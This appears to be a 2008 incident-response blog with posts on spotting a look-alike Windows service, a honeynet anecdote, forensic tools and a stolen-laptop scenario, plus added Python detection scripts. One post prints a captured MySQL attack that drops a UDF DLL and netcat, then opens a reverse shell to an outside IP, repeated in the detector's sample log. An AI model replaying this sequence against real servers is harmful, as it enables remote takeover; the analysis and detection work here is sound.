Monday, May 12, 2008

Spot the fake

When I've instructed people on IR I have run them through a live response scenario where the scenario is fairly obvious (I provide a friendly popup). My favorite thing to do to folks is transposition of letters in commonly associated programs and services. Apparently attackers still like doing this. Can you spot the fake? What are the inconsistencies between the two? Which one is real?
Finally..why does this work? Read this paper if you're interested.


Service Name: Event Log

Description: Enables event log messages issued by Windows-based programs and components to be viewed in Event Viewer. This service cannot be stopped.

Path to Executable:
C:\windows\system32\services.exe

Logon:
LocalSystem

Service Name: Events Log

Description: Enables event logs messages issued by Windows-based programs and components to be viewed in Event Viewer. This service cannot be stopped.

Path to Executable:
C:\WINDOWS\system32\drivers\csrss.exe -k NetworkService

Logon as:
.\Administrator
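The two listings above differ in more than the name: the look-alike runs a binary whose name belongs in system32 out of a different folder, carries an svchost-style "-k" argument on a binary that is not svchost, and logs on as a named local user rather than a service account. The following script is an added example (not from the original post) that audits a service listing for exactly those tells against a constructed baseline; the baseline, the sample listing, and the similarity threshold are all assumptions for illustration, and a real baseline would be taken from a clean reference build of the same Windows version.

```python
"""Flag look-alike and misconfigured Windows services from a service listing.

Added example for the 'spot the fake' exercise; not part of the original post.
The baseline, the sample listing, and the threshold are constructed for
illustration. A real listing would come from 'sc query' / 'sc qc' or WMI.
"""
import ntpath
import re
from dataclasses import dataclass
from difflib import SequenceMatcher

# Known-good services: lowercased name -> (lowercased image path, logon account).
# Constructed; build a real one from a clean system of the same Windows version.
BASELINE = {
    "event log": (r"c:\windows\system32\services.exe", "localsystem"),
    "server": (r"c:\windows\system32\svchost.exe", "localsystem"),
    "workstation": (r"c:\windows\system32\svchost.exe", "localsystem"),
}
# Core system binaries that live directly in system32; the same file name
# anywhere else (e.g. system32\drivers) is a red flag.
SYSTEM32 = r"c:\windows\system32"
SYSTEM32_ONLY = {"csrss.exe", "services.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}
# Built-in service accounts; a service running as a named user is unusual.
SERVICE_ACCOUNTS = {"localsystem", "localservice", "networkservice",
                    "nt authority\\localservice", "nt authority\\networkservice"}


@dataclass
class Service:
    name: str
    path: str   # "Path to Executable" as shown by services.msc / sc qc
    logon: str  # "Log On As" account


def split_image_path(path):
    """Split 'Path to Executable' into (lowercased exe, argument string)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)$', path)
    if not m:
        return path.lower(), ""
    return (m.group(1) or m.group(2)).lower(), m.group(3)


def look_alike(name, known, threshold):
    """Closest baseline name if it is near (transposed/added letter) but not identical."""
    best = max(known, key=lambda k: SequenceMatcher(None, name, k).ratio())
    score = SequenceMatcher(None, name, best).ratio()
    return best if score >= threshold and best != name else None


def audit(services, threshold=0.85):
    """Return {service name: [reasons]} for every service that fails a check."""
    findings = {}
    for svc in services:
        reasons = []
        exe, args = split_image_path(svc.path)
        key = svc.name.lower()
        if key in BASELINE:
            exp_exe, exp_logon = BASELINE[key]
            if exe != exp_exe:
                reasons.append(f"image path {exe} differs from baseline {exp_exe}")
            if svc.logon.lower() != exp_logon:
                reasons.append(f"logon {svc.logon} differs from baseline {exp_logon}")
        else:
            mimic = look_alike(key, BASELINE, threshold)
            if mimic:
                reasons.append(f"name mimics baseline service '{mimic}'")
        base, folder = ntpath.basename(exe), ntpath.dirname(exe)
        if base in SYSTEM32_ONLY and folder != SYSTEM32:
            reasons.append(f"system binary name {base} outside {SYSTEM32}")
        if "-k" in args.split() and base != "svchost.exe":
            reasons.append(f"'-k <group>' is an svchost.exe switch but the image is {base}")
        if svc.logon.lower() not in SERVICE_ACCOUNTS:
            reasons.append(f"runs as user account {svc.logon} instead of a service account")
        if reasons:
            findings[svc.name] = reasons
    return findings


# Constructed listing mirroring the two entries in the post.
SAMPLE = [
    Service("Event Log", r"C:\windows\system32\services.exe", "LocalSystem"),
    Service("Events Log", r"C:\WINDOWS\system32\drivers\csrss.exe -k NetworkService",
            r".\Administrator"),
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

The name check uses a similarity ratio rather than exact matching so that a single transposed, added or dropped letter still maps back to the service being imitated; the remaining checks do not need the baseline at all, which is what makes them useful during live response on a box you have never seen before.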

My arch-nemesis

Over the weekend my honeynet got pwned. I mean that in every sense of the word. I'm looking at a 50% rate of compromise. I contained the honeynet and planned on dealing with it this morning. While performing some live response on what I'd targeted as patient-0 my screen went black and my room suddenly got quiet. My office usually hums at about 70DB so when my poweredge server, firewall, precision workstation, switches, kvm, mac mini, 2 workstations AND MY HONEYNET go quiet it's pretty noticeable. I had been in the process of collecting physical memory and...poof.

At first I thought I had popped the breaker. Let's face it I have quite a bit plugged in. Then my thought process started up again...wait I've never popped the breaker..why all of a sudden?

There was a bit of shouting and people started running down the hall to see if I'd broken something..kind of funny. I then remembered something..electricians had been sighted earlier in the day. My subordinate confirmed this.

"I just saw someone run from that office in to the other room" he said pointing further down the hall.

I walked to the next office and poked my head in..

ME: "Hey are the electricians screwing with stuff?"

COWORKER: "They shouldn't be".

ME: "Well my office just went dark, where are they?"

COWORKER: "Oh, they're next door, let's go talk to them"

ME: "Probably a good idea".

We both poke our heads into the next room and I spot a power whip lying in the middle of the floor as if to mock me and display the prowess of the master electrician, and 3 guys looking at prints. On the wall I spot an open single gang box with wires mashed in a wire nut. That wall is the exact wall where I get power...

ME: "Are you guys messing with power in here?"

ELECTRICIAN: "We saw a few extra wires attached to that whip and had to disconnect it" he says looking at me sheepishly.

...silence...
...silence...
...silence..

ME: "You just took down my office".

ELECTRICIAN: "Yeah sorry about that, that's my bad. I had to disconnect the leads on that whip".

I was lost for words. My arch-nemesis killed all reasonable hope of me collecting information. The vm on bootup gave me some corrupted filesystem errors and the other virtual machines I had running had obviously lost power as well.

Why is the electrician my arch-nemesis you ask? Let's just say this isn't the first time they've struck.

Thursday, April 24, 2008

my workstation...the porcupine

I was working on a case the other day and took a quick break, and when I looked down at my workstation I thought to myself "my how my workstation looks like a porcupine". I had 5 USB dongles sticking out of the thing - one for each vendor who forces us to use dongles. In the old days of dongles we used to have the Leaning Tower of Pisa because the parallel port dongles were so large. Is there no end to the dongle insanity? Why must each vendor require their own dongle, instead of forming a consortium, sitting down at a table and figuring out a few things? I know my life would be a little bit easier if I didn't have to keep track of all those porcupine quills.

Wednesday, April 23, 2008

Ripping the Registry Live

So I have been quiet lately and there's been quite a bit happening. First off, Harlan Carvey released RegRipper. This tool is impressive and awfully useful, not to mention NEEDED. If you haven't checked it out, do so. Harlan has said this tool is not designed for live response but I've been dying to get it into a live response methodology. Well with F-Response I can do it now. Here goes ripping the registry live...sorry for my camtasia-fu or lack thereof.


A few things to note if you haven't registered with F-Response:

The field kit requires that you put the dongle in the target system. This video starts after I've done that.
The connection is not encrypted - yet.

In addition, there's a new version of RegRipper out. RegRipper is just one of the many tools whose use F-Response can facilitate. See why it's so cool?

EDIT: I put the video up on youtube..blogger's video was just too small.
EDIT: Harlan corrected this statement for me: "Harlan has said this tool is not designed for live response." This should read "RegRipper is NOT intended to be run on live Registry hive files".
EDIT: I realized an error in the previous video. The new one is correct.

Friday, April 18, 2008

I'm excited

For the first time in quite a while I'm pretty excited. Just last week Matt Shannon released F-Response. F-response looks like it may shape up to be the best tool in my arsenal. Not because it makes analysis easier but because it facilitates analysis where it wasn't possible before and it does so in such a brilliant way that I'm just amazed. It also allows responders or examiners the opportunity to use the bulk of their toolkit safely and without the immense impact that many of our tools have on systems. When I've taught classes I specifically instruct people NOT to run AV, backups, and the other things that people like to execute to "investigate". This tool re-opens that door and can allow a first responder to actually respond to the incident, analyze with their typical toolset, and escalate when needed.

I'll be writing quite a bit about this tool and what can be done with it because I am just that excited about it.

Wednesday, March 26, 2008

Name that hack

Today my honeynet was the victim of an oldie but goodie. It's time to play "NAME THAT HACK". What do you think is happening here?

A...
5.0.45-community-nt.^!..u"G|_G${.,.................c]+Yba?Ti4d{.
@..........@........................root....'NF.g".|Z/...=ao.nmysql.
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
( ...INSERT INTO cmd (codetab) VALUES ( 0000100000000000000000000000000000200000602e72646174610000e009 [Truncated by me])
...........
5....SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
......."...
?....CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
...........
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
(....INSERT INTO cmd (codetab) VALUES ( 00400000c02e696461746100005c070000002001000008000000e000 [truncated by me])
...........
3....SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
......."...
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
D....SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
.....R....def...cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')..?.........................537912269770588160.........
.....


Where would you begin your investigation?
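One place to begin is the server's own query history: the capture above has a distinctive shape (a BLOB written out with SELECT ... INTO DUMPFILE to a library or executable path, CREATE FUNCTION ... SONAME loading that file as a UDF, FLUSH LOGS to rotate the evidence, then a call to the new function) that stands out in a MySQL general query log even when each statement is legitimate on its own. The script below is an added example, not from the original post, that walks general-log lines per connection and reports how far that sequence got; the log lines are constructed to mirror the capture (with a documentation-range IP in place of the real one), and the log line format assumed is the classic "YYMMDD HH:MM:SS  id Command  Argument" layout.

```python
"""Spot a MySQL UDF-drop sequence in general query log lines.

Added example, not from the original post. SAMPLE_LOG is constructed to
mirror the capture in the post; real lines come from the general query log
of the affected server (or a network sensor, since FLUSH LOGS on the victim
may have rotated the local copy away).
"""
import re
from collections import defaultdict

# "080326 14:02:11   3 Query  <sql>"; the timestamp is omitted on repeated lines.
LOG_LINE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s+(\d+)\s+(\w+)\s*(.*)$")

# Stages of the sequence, matched against the SQL text of each Query line.
STAGES = [
    ("dumpfile_binary", re.compile(r"INTO\s+DUMPFILE\s+'[^']*\.(dll|so|exe)'", re.I)),
    ("create_udf", re.compile(r"CREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME", re.I)),
    ("flush_logs", re.compile(r"^\s*FLUSH\s+LOGS\b", re.I)),
]
CREATE_NAME = re.compile(r"CREATE\s+FUNCTION\s+(\w+)", re.I)


def parse(line):
    """Return (thread id, command, argument) or None for lines that do not parse."""
    m = LOG_LINE.match(line)
    return (int(m.group(1)), m.group(2), m.group(3)) if m else None


def analyze(lines):
    """Return {thread id: {'stages': [...], 'udfs': [...], 'verdict': str}}.

    Each connection is tracked separately because the attacker does all of
    this on one session; a call to a function that the same connection just
    created with SONAME is the strongest signal.
    """
    conns = defaultdict(lambda: {"stages": [], "udfs": [], "verdict": "clean"})
    for line in lines:
        parsed = parse(line)
        if not parsed:
            continue
        tid, cmd, sql = parsed
        if cmd != "Query":
            continue
        state = conns[tid]
        for stage, rx in STAGES:
            if rx.search(sql):
                state["stages"].append(stage)
        created = CREATE_NAME.search(sql)
        if created:
            state["udfs"].append(created.group(1))
        else:
            for udf in state["udfs"]:
                if re.search(rf"\b{re.escape(udf)}\s*\(", sql, re.I):
                    state["stages"].append("udf_call:" + udf)
    for state in conns.values():
        s = state["stages"]
        if "dumpfile_binary" in s and "create_udf" in s:
            called = any(x.startswith("udf_call:") for x in s)
            state["verdict"] = "udf_executed" if called else "udf_dropped"
        elif "dumpfile_binary" in s:
            state["verdict"] = "binary_written"
    return dict(conns)


# Constructed log excerpt; thread 3 mirrors the capture, threads 4 and 5 are benign.
SAMPLE_LOG = r"""
080326 14:02:11    3 Connect  root@10.0.0.5 on
080326 14:02:11    3 Query    CREATE DATABASE nmxtmp
080326 14:02:11    3 Query    USE nmxtmp
080326 14:02:11    3 Query    CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
080326 14:02:12    3 Query    INSERT INTO cmd (codetab) VALUES (0x4d5a90...)
080326 14:02:12    3 Query    SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
080326 14:02:12    3 Query    CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
080326 14:02:12    3 Query    DROP DATABASE nmxtmp
080326 14:02:12    3 Query    FLUSH LOGS
080326 14:02:13    3 Query    SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
080326 14:02:14    3 Query    SELECT cmd_execute('..\\data\\nc.exe 192.0.2.10 2095 -e cmd.exe')
080326 14:02:20    4 Query    SELECT name, price FROM catalog WHERE id = 7
080326 14:02:21    5 Query    SELECT * INTO OUTFILE '/tmp/report.csv' FROM orders
""".strip().splitlines()

if __name__ == "__main__":
    for tid, state in sorted(analyze(SAMPLE_LOG).items()):
        print(tid, state["verdict"], state["stages"])
```

Thread 5 shows why the DUMPFILE check is keyed on the file extension: INTO OUTFILE to a CSV is routine reporting, while a BLOB dumped to a .dll/.so/.exe is almost never. On the prevention side, the capture also answers the "why did this work" question: the attacker authenticated as root with the FILE privilege and the server could write into its own bin and data directories, which is what application accounts without FILE, a restrictive secure_file_priv, and a plugin directory the mysqld account cannot write to are meant to take away.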

Thursday, March 20, 2008

When laptops grow legs

One fine day in Europe an American businessman was traveling by train. There was suddenly a large commotion occurring somewhere up ahead in the passenger car. The businessman set his laptop down on top of his laptop bag on the empty seat next to him and stood up to observe the commotion. There appeared to be an argument of some form between two gentlemen. As the businessman sat back down he reached over to grab his laptop, except it wasn't there. Looking all around, he didn't see anything that looked suspicious. The laptop had been stolen right out from under his nose..literally.

Upon arriving back home, the businessman alerted his IT support staff that his laptop had been stolen and that he needed a new one right away. Following policy, the IT staff member notified his security staff.

Does knowing what was on the laptop make a difference? What if you don't know exactly what was on the laptop? Can you trust the businessman's claims that "there wasn't client data on there" or "there wasn't credit card information on my laptop"?

Do you consider the laptop compromised automatically and look for a backup of the laptop to use as a reference point for notifying individuals? Do you ignore the fact that the system was stolen?

If a case like this gets turned over to you, how do you handle it?